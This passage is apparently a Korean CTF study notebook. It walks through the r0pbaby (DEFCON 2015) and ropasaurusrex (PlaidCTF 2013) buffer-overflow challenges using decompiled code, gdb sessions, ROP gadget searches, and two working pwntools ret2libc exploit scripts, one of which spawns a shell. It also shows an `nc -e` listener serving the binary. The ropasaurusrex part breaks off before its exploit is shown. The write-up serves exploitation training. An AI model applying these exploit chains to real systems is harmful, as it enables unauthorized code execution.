앞만 보고 가는거야!!!

[[ 문제 ]]

https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/babys-first/r0pbaby 

./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): 10
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:
Bad choice.
Segmentation fault (core dumped)
babyhack@ubuntu:~/tmp$ ls 

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  signed int v3; // eax@4
  unsigned __int64 v4; // r14@15
  int v5; // er13@17
  size_t v6; // r12@17
  int v7; // eax@18
  void *handle; // [rsp+8h] [rbp-448h]@1
  char nptr[1088]; // [rsp+10h] [rbp-440h]@2
  __int64 savedregs; // [rsp+450h] [rbp+0h]@22

  setvbuf(stdout, 0LL, 2, 0LL);
  signal(14, handler);
  alarm(0x3Cu);
  puts("\nWelcome to an easy Return Oriented Programming challenge...");
  puts("Menu:");
  handle = dlopen("libc.so.6", 1);
  while ( 1 )
  {
    while ( 1 )
    {
      while ( 1 )
      {
        while ( 1 )
        {
          Menu_sub_BF7();
          if ( !sub_B9A((__int64)nptr, 1024LL) )
          {
            puts("Bad choice.");
            return 0LL;
          }
          v3 = strtol(nptr, 0LL, 10);
          if ( v3 != 2 )
            break;
          __printf_chk(1LL, "Enter symbol: ");
          if ( sub_B9A((__int64)nptr, 64LL) )
          {
            dlsym(handle, nptr);
            __printf_chk(1LL, "Symbol %s: 0x%016llX\n");
          }
          else
          {
            puts("Bad symbol.");
          }
        }
        if ( v3 > 2 )
          break;
        if ( v3 != 1 )
          goto LABEL_24;
        __printf_chk(1LL, "libc.so.6: 0x%016llX\n");
      }
      if ( v3 != 3 )
        break;
      __printf_chk(1LL, "Enter bytes to send (max 1024): ");
      sub_B9A((__int64)nptr, 1024LL);
      v4 = (signed int)strtol(nptr, 0LL, 10);
      if ( v4 - 1 > 0x3FF )
      {
        puts("Invalid amount.");
      }
      else
      {
        if ( v4 )
        {
          v5 = 0;
          v6 = 0LL;
          while ( 1 )
          {
            v7 = _IO_getc(stdin);
            if ( v7 == -1 )
              break;
            nptr[v6] = v7;
            v6 = ++v5;
            if ( v4 <= v5 )
              goto LABEL_22;
          }
          v6 = v5 + 1;
        }
        else
        {
          v6 = 0LL;
        }
LABEL_22:
        memcpy(&savedregs, nptr, v6);    <---- memcpy를 입력한 숫자 만큼 입력 받음.
      }
    }
    if ( v3 == 4 )
      break;
LABEL_24:
    puts("Bad choice.");
  }
  dlclose(handle);
  puts("Exiting.");
  return 0LL;
} 

babyhack@ubuntu:~/tmp$ (python -c 'print "3\n" + "20\n" + "a"*30 + "\n"';cat) | ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Enter bytes to send (max 1024): 1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.

Segmentation fault (core dumped)
babyhack@ubuntu:~/tmp$

babyhack@ubuntu:~/tmp$ gdb -q r0pbaby
Reading symbols from r0pbaby...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/babyhack/tmp/r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 1
libc.so.6: 0x00007FFFF7FF79B0
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: system
Symbol system: 0x00007FFFF7857640
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: ^C
Program received signal SIGINT, Interrupt.
0x00007ffff78fc810 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:81
81 ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) info proc map
process 11848
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      0x555555554000     0x555555556000     0x2000        0x0 /home/babyhack/tmp/r0pbaby
      0x555555755000     0x555555757000     0x2000     0x1000 /home/babyhack/tmp/r0pbaby
      0x555555757000     0x555555778000    0x21000        0x0 [heap]
      0x7ffff7811000     0x7ffff79cc000   0x1bb000        0x0 /lib/x86_64-linux-gnu/libc-2.19.so
      0x7ffff79cc000     0x7ffff7bcb000   0x1ff000   0x1bb000 /lib/x86_64-linux-gnu/libc-2.19.so
      0x7ffff7bcb000     0x7ffff7bcf000     0x4000   0x1ba000 /lib/x86_64-linux-gnu/libc-2.19.so
      0x7ffff7bcf000     0x7ffff7bd1000     0x2000   0x1be000 /lib/x86_64-linux-gnu/libc-2.19.so
      0x7ffff7bd1000     0x7ffff7bd6000     0x5000        0x0
      0x7ffff7bd6000     0x7ffff7bd9000     0x3000        0x0 /lib/x86_64-linux-gnu/libdl-2.19.so
      0x7ffff7bd9000     0x7ffff7dd8000   0x1ff000     0x3000 /lib/x86_64-linux-gnu/libdl-2.19.so
      0x7ffff7dd8000     0x7ffff7dd9000     0x1000     0x2000 /lib/x86_64-linux-gnu/libdl-2.19.so
      0x7ffff7dd9000     0x7ffff7dda000     0x1000     0x3000 /lib/x86_64-linux-gnu/libdl-2.19.so
      0x7ffff7dda000     0x7ffff7dfd000    0x23000        0x0 /lib/x86_64-linux-gnu/ld-2.19.so
      0x7ffff7fdf000     0x7ffff7fe2000     0x3000        0x0
      0x7ffff7ff5000     0x7ffff7ff8000     0x3000        0x0
      0x7ffff7ff8000     0x7ffff7ffa000     0x2000        0x0 [vvar]
      0x7ffff7ffa000     0x7ffff7ffc000     0x2000        0x0 [vdso]
      0x7ffff7ffc000     0x7ffff7ffd000     0x1000    0x22000 /lib/x86_64-linux-gnu/ld-2.19.so
      0x7ffff7ffd000     0x7ffff7ffe000     0x1000    0x23000 /lib/x86_64-linux-gnu/ld-2.19.so
---Type <return> to continue, or q <return> to quit---

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/babyhack/tmp/r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): 10
AAAAABBBBBCCCCCDDDDD
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:
Bad choice.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7834242 in __strtok_r_1c (__nextp=<optimized out>, __sep=<optimized out>,
    __s=0x7ffff78fc870 <__write_nocancel+7> "H=\001\360\377\377s1\303H\203\354\b\350\356\310\001")
    at ../string/bits/string2.h:1161
1161 ../string/bits/string2.h: No such file or directory.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/babyhack/tmp/r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): 10
AAAABBBBCC
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.

Program received signal SIGSEGV, Segmentation fault.
__gconv_open (toset=<error reading variable: Cannot access memory at address 0x42424242414140d1>,
    toset@entry=<error reading variable: Cannot access memory at address 0x4242424241414149>,
    fromset=<error reading variable: Cannot access memory at address 0x42424242414140d9>,
    fromset@entry=<error reading variable: Cannot access memory at address 0x4242424241414149>,
    handle=<error reading variable: Cannot access memory at address 0x42424242414140a9>,
    handle@entry=<error reading variable: Cannot access memory at address 0x4242424241414149>,
    flags=<error reading variable: Cannot access memory at address 0x42424242414140c9>,
    flags@entry=<error reading variable: Cannot access memory at address 0x4242424241414149>) at gconv_open.c:93
93 gconv_open.c: No such file or directory.
(gdb)

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): 20
AAAABBBBCCCCDDDDEEEE
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.

Program received signal SIGSEGV, Segmentation fault.
0x0000555555554eb3 in ?? ()
(gdb) x/i $rip
=> 0x555555554eb3: retq  
(gdb) x/gw $rsp
0x7fffffffdf28: 0x43434343
(gdb)  

[[ x64 ret 주소 참조 순서 ]] 

rdi -> rsi -> rdx -> r10 -> r9 -> r8 > .......

babyhack@ubuntu:~/tmp$ ./rp-lin-x64 -f /lib/x86_64-linux-gnu/libc.so.6 -r 4 | grep "pop rdi" | more
.......................
0x0002c46f: pop rdi ; ret  ;  (1 found)
0x0002c581: pop rdi ; ret  ;  (1 found)
0x0002cdf5: pop rdi ; ret  ;  (1 found)
0x0002d087: pop rdi ; ret  ;  (1 found)
0x0002dd87: pop rdi ; ret  ;  (1 found)
0x0002f72c: pop rdi ; ret  ;  (1 found
................ 

[buff] +  gadget [pop rdi; ret] + [/bin/sh string addr] + [system addr]

[[ /bin/sh 문자열 offset 확인 ]]
babyhack@ubuntu:~/tmp$ strings -a -tx /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
 17ccdb /bin/sh
babyhack@ubuntu:~/tmp$

[[ system 함수 offset 확인 ]]

babyhack@ubuntu:~/tmp$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep "system"
   223: 000000000012b2c0    70 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.2.5
   577: 0000000000046640    45 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
  1337: 0000000000046640    45 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.2.5
babyhack@ubuntu:~/tmp$

[[ 라이브러리 주소 확인 ]]

babyhack@ubuntu:~/tmp$ ldd ./r0pbaby
 linux-vdso.so.1 =>  (0x00007ffca2aeb000)
 libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f2b712e3000)
 libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f2b70f1e000)
 /lib64/ld-linux-x86-64.so.2 (0x00007f2b716ea000)
babyhack@ubuntu:~/tmp$

[[ exploit - 1 ]]

from pwn import *
from struct import *

endian = lambda x:struct.pack('<Q', x)

binsh_offset = 0x17ccdb
pop_ret_offset = 0x2c581
system_offset = 0x46640

s = process("./r0pbaby")
print s.recvuntil(": ") # Menu

s.send("1\n")           # 1. Get libc address
get_libc_addr = s.recv(2048)
print "[*] %s " % get_libc_addr
libc_addr = eval(get_libc_addr.split(':')[1])
print "[*] libc split : 0x%08X" % libc_addr

print s.recvuntil(": ") # Menu

s.send("2\n")           # 2. Get address of a libc function
print "[*] %s " % s.recv(2048)
s.send("system\n")      # "system" function
system_recv = s.recv(2014)
print "[recv] %s" % system_recv
system_addr = eval(system_recv.split(':')[1])

# payload
payload = "A" * 8
payload += endian(libc_addr + pop_ret_offset) # pop rdi; ret;
payload += endian(libc_addr + binsh_offset)
payload += endian(system_addr)

print "[*] Payload : %s" % payload

s.send("3\n")
s.recv(1024)
s.send("%d\n" %(len(payload)+1))
s.send(payload + "\n")
s.send("4\n")
s.recv(1024)
s.interactive() 

[[ 결과 ]]

babyhack@ubuntu:~/tmp$ python exp.py
[+] Started program './r0pbaby'

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:
[*] libc.so.6: 0x00007FC2C2A989B0
 
[*] libc split : 0x7FC2C2A989B0
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:
[*] Enter symbol: 
[recv] Symbol system: 0x00007FC2C20F0640

[*] Payload : AAAAAAAA1O\xac��\x7f\x00\x00\x8bV���\x00\x00@\x06\x0f��\x7f\x00\x00
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ 

[[ exp 2.py ]]

from pwn import *
from struct import *

endian = lambda x:struct.pack('<Q', x)

binsh_offset = 0x17ccdb
pop_ret_offset = 0x2c581
system_offset = 0x46640

s = process("./r0pbaby")

print s.recvuntil(": ") # Menu

s.send("1\n")           # 1. Get libc address
get_libc_addr = s.recv(2048)
print "[*] %s " % get_libc_addr
libc_addr = eval(get_libc_addr.split(':')[1])
print "[*] libc split : 0x%08X" % libc_addr

print s.recvuntil(": ") # Menu

s.send("2\n")           # 2. Get address of a libc function
print "[*] %s " % s.recv(2048)
s.send("system\n")      # "system" function
system_recv = s.recv(2014)
print "[recv] %s" % system_recv

system_addr = eval(system_recv.split(':')[1])

print "[*] System Addr split : 0x%08X" % system_addr
libc_base = system_addr - system_offset
print "[*] calc - libc_base : 0x%08X" % libc_base

# payload
payload = "A" * 8
payload += endian(libc_base + pop_ret_offset) # pop rdi; ret;
payload += endian(libc_base + binsh_offset)
payload += endian(system_addr)

print "[*] Payload : %s" % payload

s.send("3\n")
s.recv(1024)
s.send("%d\n" %(len(payload)+1))
s.send(payload + "\n")
s.send("4\n")

s.interactive() 

[[ 결과 ]] 

babyhack@ubuntu:~/tmp$ python 2exp.py
[+] Started program './r0pbaby'

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:
[*] libc.so.6: 0x00007F433F12D9B0
 
[*] libc split : 0x7F433F12D9B0
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:
[*] Enter symbol: 
[recv] Symbol system: 0x00007F433E785640

[*] System Addr split : 0x7F433E785640
[*] calc - libc_base : 0x7F433E73F000
[*] Payload : AAAAAAAA\x81\xb5v>C\x7f\x00\x00ۼ\x8b>C\x7f\x00\x00@Vx>C\x7f\x00\x00
[*] Switching to interactive mode
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Exiting.
$ id
uid=1000(babyhack) gid=1000(babyhack) groups=1000(babyhack),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
$ 

https://github.com/isislab/CTF-Challenges/tree/master/pctf2013/pwnable/ropasaurusrex 

[asm]

.text:0804841D                               ; int __cdecl main(int, char **, char **)
.text:0804841D                               main            proc near               ; DATA XREF: start+17o
.text:0804841D 55                                            push    ebp
.text:0804841E 89 E5                                         mov     ebp, esp
.text:08048420 83 E4 F0                                      and     esp, 0FFFFFFF0h
.text:08048423 83 EC 10                                      sub     esp, 10h
.text:08048426 E8 C9 FF FF FF                                call    sub_80483F4
.text:0804842B C7 44 24 08 04 00 00 00                       mov     dword ptr [esp+8], 4 ; n
.text:08048433 C7 44 24 04 10 85 04 08                       mov     dword ptr [esp+4], offset aWin ; "WIN\n"
.text:0804843B C7 04 24 01 00 00 00                          mov     dword ptr [esp], 1 ; fd
.text:08048442 E8 C5 FE FF FF                                call    _write
.text:08048447 C9                                            leave
.text:08048448 C3                                            retn
.text:08048448                               main            endp

[psuedo]

int __cdecl main()
{
  sub_80483F4();
  return write(1, "WIN\n", 4u);
} 

[asm]

.text:080483F4                               sub_80483F4     proc near               ; CODE XREF: main+9p
.text:080483F4
.text:080483F4                               buf             = byte ptr -88h
.text:080483F4
.text:080483F4 55                                            push    ebp
.text:080483F5 89 E5                                         mov     ebp, esp
.text:080483F7 81 EC 98 00 00 00                             sub     esp, 98h
.text:080483FD C7 44 24 08 00 01 00 00                       mov     dword ptr [esp+8], 100h ; nbytes
.text:08048405 8D 85 78 FF FF FF                             lea     eax, [ebp+buf]
.text:0804840B 89 44 24 04                                   mov     [esp+4], eax    ; buf
.text:0804840F C7 04 24 00 00 00 00                          mov     dword ptr [esp], 0 ; fd
.text:08048416 E8 11 FF FF FF                                call    _read
.text:0804841B C9                                            leave
.text:0804841C C3                                            retn
.text:0804841C                               sub_80483F4     endp

[psuedo]

ssize_t sub_80483F4()
{
  char buf; // [esp+10h] [ebp-88h]@1

  return read(0, &buf, 0x100u);
}

[babyhack@localhost pcf2013]$ (python -c 'print "a"*138';cat) | ./vul
WIN

세그멘테이션 오류 (core dumped)
[babyhack@localhost pcf2013]$ (python -c 'print "a"*139';cat) | ./vul
WIN

세그멘테이션 오류 (core dumped)
[babyhack@localhost pcf2013]$ (python -c 'print "a"*140';cat) | ./vul

세그멘테이션 오류 (core dumped)
[babyhack@localhost pcf2013]$

babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$ ../../checksec.sh --file vul
RELRO           STACK CANARY      NX               PIE             RPATH        RUNPATH        FILE
No RELRO      No canary found     NX enabled    No PIE        No RPATH   No RUNPATH   vul
babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$  

(gdb) disas main
No symbol table is loaded.  Use the "file" command. 

[babyhack@localhost pcf2013]$ gdb -q vul
Reading symbols from vul...(no debugging symbols found)...done.
(gdb) info file
Symbols from "/tmp/pwnable/pcf2013/vul".
Local exec file:
 `/tmp/pwnable/pcf2013/vul', file type elf32-i386.
 Entry point: 0x8048340
 0x08048114 - 0x08048127 is .interp
 0x08048128 - 0x08048148 is .note.ABI-tag
 0x08048148 - 0x0804816c is .note.gnu.build-id
 0x0804816c - 0x08048198 is .hash
 0x08048198 - 0x080481b8 is .gnu.hash
 0x080481b8 - 0x08048218 is .dynsym
 0x08048218 - 0x08048268 is .dynstr
 0x08048268 - 0x08048274 is .gnu.version
 0x08048274 - 0x08048294 is .gnu.version_r
 0x08048294 - 0x0804829c is .rel.dyn
 0x0804829c - 0x080482bc is .rel.plt
 0x080482bc - 0x080482ec is .init
 0x080482ec - 0x0804833c is .plt
 0x08048340 - 0x080484ec is .text
 0x080484ec - 0x08048508 is .fini
 0x08048508 - 0x08048515 is .rodata
 ..........................................

(gdb) disas 0x08048340, 0x080484ec
Dump of assembler code from 0x8048340 to 0x80484ec:
   0x08048340: xor    %ebp,%ebp
   0x08048342: pop    %esi
   0x08048343: mov    %esp,%ecx
   0x08048345: and    $0xfffffff0,%esp
   0x08048348: push   %eax
   0x08048349: push   %esp
   0x0804834a: push   %edx
   0x0804834b: push   $0x8048450
   0x08048350: push   $0x8048460
   0x08048355: push   %ecx
   0x08048356: push   %esi
   0x08048357: push   $0x804841d   <-- main 시작 주소
   0x0804835c: call   0x804831c <__libc_start_main@plt>
..........................

(gdb) disas 0x0804841d, 0x0806841d
Dump of assembler code from 0x804841d to 0x806841d:
   0x0804841d: push   %ebp
   0x0804841e: mov    %esp,%ebp
   0x08048420: and    $0xfffffff0,%esp
   0x08048423: sub    $0x10,%esp
   0x08048426: call   0x80483f4
   0x0804842b: movl   $0x4,0x8(%esp)
   0x08048433: movl   $0x8048510,0x4(%esp)    <- "WIN" 문자열 있는 주소
   0x0804843b: movl   $0x1,(%esp)
   0x08048442: call   0x804830c <write@plt>
   0x08048447: leave 
   0x08048448: ret   
   0x08048449: nop
   0x0804844a: nop

.......................

(gdb) x/s 0x08048510
0x8048510: "WIN\n"
(gdb)

(gdb) disas 0x80483f4, 0x80583f4
Dump of assembler code from 0x80483f4 to 0x80583f4:
   0x080483f4: push   %ebp
   0x080483f5: mov    %esp,%ebp
   0x080483f7: sub    $0x98,%esp                <-- REP 위치 크기
   0x080483fd: movl   $0x100,0x8(%esp)
   0x08048405: lea    -0x88(%ebp),%eax     <-- stack 크기
   0x0804840b: mov    %eax,0x4(%esp)
   0x0804840f: movl   $0x0,(%esp)
   0x08048416: call   0x804832c <read@plt>
   0x0804841b: leave 
   0x0804841c: ret   
 .................

(gdb) info reg
eax            0xbffff040 -1073745856
ecx            0xbf612fd7 -1084149801
edx            0xbffff114 -1073745644
ebx            0x0 0
esp            0xbffff030 0xbffff030
ebp            0xbffff0c8 0xbffff0c8
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x804840b 0x804840b
eflags         0x286 [ PF SF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51 

[bof 검증 진행]

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaccccdddd

a * [136] -- stack

c * [4] -- ebp

d * [4] -- eip

0x64646464 in ?? ()
(gdb) info reg
eax            0x95 149
ecx            0xbffff040 -1073745856
edx            0x100 256
ebx            0x0 0
esp            0xbffff0d0 0xbffff0d0
ebp            0x63636363 0x63636363
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x64646464 0x64646464
eflags         0x10203 [ CF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51

(gdb) b *0x0804841b
Breakpoint 1 at 0x804841b
(gdb) r
Starting program: /tmp/pwnable/pcf2013/vul
Missing separate debuginfos, use: dnf debuginfo-install glibc-2.22-3.fc23.i686
aaaaaaaaaaa

Breakpoint 1, 0x0804841b in ?? ()
(gdb) info reg
eax            0xc 12
ecx            0xbffff040 -1073745856
edx            0x100 256
ebx            0x0 0
esp            0xbffff030 0xbffff030
ebp            0xbffff0c8 0xbffff0c8
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x804841b 0x804841b
eflags         0x203 [ CF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51
(gdb) x/80wx $esp
0xbffff030: 0x00000000 0xbffff040 0x00000100 0x00000001
0xbffff040: 0x61616161 0x61616161 0x0a616161 0xb7fff8f8

              --------------

                 buff 시작
0xbffff050: 0x00000000 0x00000009 0x000000c2 0x02c0003f
0xbffff060: 0x00000000 0x00f0b0ff 0xbffff09a 0x00000000
0xbffff070: 0xb7ffefc4 0xb7fff8f8 0xbffff01d 0x08048246

                                           ----------- --------------

                                                esp         eip
0xbffff080: 0xb7fd93d0 0xbffff124 0x00000001 0xb7eef277
0xbffff090: 0xffffffff 0x0000002f 0xb7e03ce4 0xb7fd93d0
0xbffff0a0: 0x00008000 0x08049604 0xbffff0b8 0x080482e8
0xbffff0b0: 0x00000001 0x08049604 0xbffff0e8 0x08048479
0xbffff0c0: 0x00000001 0xb7fc0000 0xbffff0e8 0x0804842b
0xbffff0d0: 0xb7fc03dc 0xb7fff8f8 0x0804846b 0x00000000
0xbffff0e0: 0x00000001 0xb7fc0000 0x00000000 0xb7e0f545
0xbffff0f0: 0x00000001 0xbffff184 0xbffff18c 0x00000000
0xbffff100: 0x00000000 0x00000000 0xb7fc0000 0xb7fffbe4
0xbffff110: 0x08048218 0x00000000 0x00000001 0xb7fc0000
0xbffff120: 0x00000000 0xccb09826 0xf2bb7236 0x00000000
0xbffff130: 0x00000000 0x00000000 0x00000001 0x08048340
0xbffff140: 0x00000000 0xb7ff2910 0xb7fec920 0xb7ffefc4
0xbffff150: 0x00000001 0x08048340 0x00000000 0x08048361
0xbffff160: 0x0804841d 0x00000001 0xbffff184 0x08048460
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/pwnable/pcf2013/vul
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Breakpoint 1, 0x0804841b in ?? ()
(gdb) x/80wx $esp
0xbffff030: 0x00000000 0xbffff040 0x00000100 0x00000001
0xbffff040: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff050: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff060: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff070: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff080: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff090: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff0a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff0b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff0c0: 0x61616161 0xb7fc000a 0xbffff0e8 0x0804842b
                                              ----------- --------------

                                                  ebp         ret

0xbffff0d0: 0xb7fc03dc 0xb7fff8f8 0x0804846b 0x00000000
0xbffff0e0: 0x00000001 0xb7fc0000 0x00000000 0xb7e0f545
0xbffff0f0: 0x00000001 0xbffff184 0xbffff18c 0x00000000
0xbffff100: 0x00000000 0x00000000 0xb7fc0000 0xb7fffbe4
0xbffff110: 0x08048218 0x00000000 0x00000001 0xb7fc0000
0xbffff120: 0x00000000 0x043625c7 0x3a3dcfd7 0x00000000
0xbffff130: 0x00000000 0x00000000 0x00000001 0x08048340
0xbffff140: 0x00000000 0xb7ff2910 0xb7fec920 0xb7ffefc4
0xbffff150: 0x00000001 0x08048340 0x00000000 0x08048361
0xbffff160: 0x0804841d 0x00000001 0xbffff184 0x08048460
(gdb) info reg
eax            0x85 133   <-- 입력한 문자 수
ecx            0xbffff040 -1073745856
edx            0x100 256
ebx            0x0 0
esp            0xbffff030 0xbffff030
ebp            0xbffff0c8 0xbffff0c8
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x804841b 0x804841b
eflags         0x207 [ CF PF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/pwnable/pcf2013/vul
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc

Breakpoint 1, 0x0804841b in ?? ()
(gdb) x/80wx $esp
0xbffff030: 0x00000000 0xbffff040 0x00000100 0x00000001
0xbffff040: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff050: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff060: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff070: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff080: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff090: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff0a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff0b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff0c0: 0x61616161 0x62626262 0x63636363 0x0804840a

                                               ------------- -------------

                                                    ebp          ret
0xbffff0d0: 0xb7fc03dc 0xb7fff8f8 0x0804846b 0x00000000
0xbffff0e0: 0x00000001 0xb7fc0000 0x00000000 0xb7e0f545
0xbffff0f0: 0x00000001 0xbffff184 0xbffff18c 0x00000000
0xbffff100: 0x00000000 0x00000000 0xb7fc0000 0xb7fffbe4
0xbffff110: 0x08048218 0x00000000 0x00000001 0xb7fc0000
0xbffff120: 0x00000000 0x1bba14b9 0x25b1fea9 0x00000000
0xbffff130: 0x00000000 0x00000000 0x00000001 0x08048340
0xbffff140: 0x00000000 0xb7ff2910 0xb7fec920 0xb7ffefc4
0xbffff150: 0x00000001 0x08048340 0x00000000 0x08048361
0xbffff160: 0x0804841d 0x00000001 0xbffff184 0x08048460
(gdb) info reg
eax            0x8d 141
ecx            0xbffff040 -1073745856
edx            0x100 256
ebx            0x0 0
esp            0xbffff030 0xbffff030
ebp            0xbffff0c8 0xbffff0c8
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x804841b 0x804841b
eflags         0x203 [ CF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51

(gdb) x/s $ebp
0xbffff0c8: "cccc\n\204\004\b\334\003\374\267\370\370\377\267k\204\004\b"

(gdb) b *0x0804842b
Breakpoint 1 at 0x804842b
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/pwnable/pcf2013/vul
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) info reg
eax            0x91 145
ecx            0xbffff040 -1073745856
edx            0x100 256
ebx            0x0 0
esp            0xbffff0d0 0xbffff0d0
ebp            0x63636363 0x63636363
esi            0x1 1
edi            0xb7fc0000 -1208221696
eip            0x41414141 0x41414141
eflags         0x10207 [ CF PF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51
(gdb)

[pwntools - install]

1. apt-get install python, python-dev, python-pip

2. apt-get url add

   - vi /etc/apt/sources.list

   - "deb http://us.archive.ubuntu.com/ubuntu vivid main universe"

3. apt-get install libcapstone-dev (python2.7-dev 설치시 따로 설치 안해 됨.)

4. pip install pwntools

$ while true; do nc -vv -l -p 1234 -e ./vul; done
listening on [any] 1234 ... 

objdump -x vul

vul:     file format elf32-i386
vul
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x08048340

Program Header:
    PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
